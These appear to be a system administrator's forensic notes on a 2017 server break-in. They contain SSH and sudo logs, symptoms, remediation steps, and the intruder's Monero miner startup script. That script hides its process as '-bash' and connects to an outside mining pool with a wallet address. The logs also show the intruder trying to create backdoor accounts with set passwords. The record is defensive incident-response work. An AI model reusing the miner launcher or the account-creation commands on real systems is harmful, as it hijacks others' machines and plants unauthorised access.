2017-11 virus

Warnings

Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 200.187.150.144 port 10248 ssh2
Nov 20 10:53:56 mercury sshd[9291]: Accepted password for www-data from 155.133.82.12 port 51625 ssh2
Nov 20 12:34:46 mercury sshd[12877]: Accepted publickey for www-data from 155.133.82.12 port 57274 ssh2
Nov 20 12:34:46 mercury sshd[12879]: Accepted publickey for www-data from 155.133.82.12 port 57280 ssh2

/var/www had a .ssh/ dated 2017-11-20, and this in authorized_keys

mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq” listd

mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd

mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd

it’s this code: https://forums.gentoo.org/viewtopic-t-1071762.html?sid=dd3123941f591f81c8ab5b8c4769dd1f

Conclusions

• It looks like either the www-data password was guessed, or was set by something running as www-data.

Actions

• Add "DenyUsers www-data" to /etc/ssh/sshd_config
• delete /var/www/.ssh
• create ~www-data/.ssh : ---------- 1 root root 0 Nov 28 08:19 .ssh

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtS6xFlhMDBbJHpbeSKNbs3z3+tv/TEy3dOStR0DxNXNmHG0ub/yJWeV7+1fKW9U4Vmw5xyZAweAm8Firt9174tFViaPmGS/glWfxUcpdCRai7BjIWfxkFyxQVDSndtL3AJBm+0ekTrK+j8QRYzKzyvJUnfL3NSOvsH186ziaB6eTsBhWXUYAiU0y+2z6p/XYfzvs984IWOg/rLbeofRZSdU1Kx2g5Wix7UMS+Oi2UFwTFWvNWstkuNOLPg92DMaMiRgEKycwf1JfUrY8nWI7kwlJz/VO5rE9+J2o7ulI6eDWY5q7+zylKLg4bXnkS7wYYUfEPXobtNLgkZ5SUo6DD root@studiantes

Symptoms

• CPU at 100%
• a process called md32 running
• lots of processes named "b" running
• files installed in /tmp/.s/ and /tmp/.b30/
• /tmp/b30.tar moved to ~daniel/
• Logfile "mata" looks like block mining
• Notice a "wallet" config option below

The Startup

/tmp/.s/upd looks like:

#!/bin/bash
#[+] Miner v2.0 - 2017
#[+] Author: PRG @ #old UnderNet

wallet="4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8"
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
fi
echo $! > bash.pid

0 S www-data 18219     1  4  80   0 - 28841 futex_ 10:13 ?        00:00:19 -bash                                                                                                                                                                                                                                                           -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8 -p x

---

mercury.bonmot.ca : Nov 27 23:21:30 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd

mercury.bonmot.ca : Nov 27 23:21:46 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd

mercury.bonmot.ca : Nov 27 23:22:01 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd

mercury.bonmot.ca : Nov 28 02:36:29 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd

mercury.bonmot.ca : Nov 28 02:36:43 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd

mercury.bonmot.ca : Nov 28 02:36:57 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd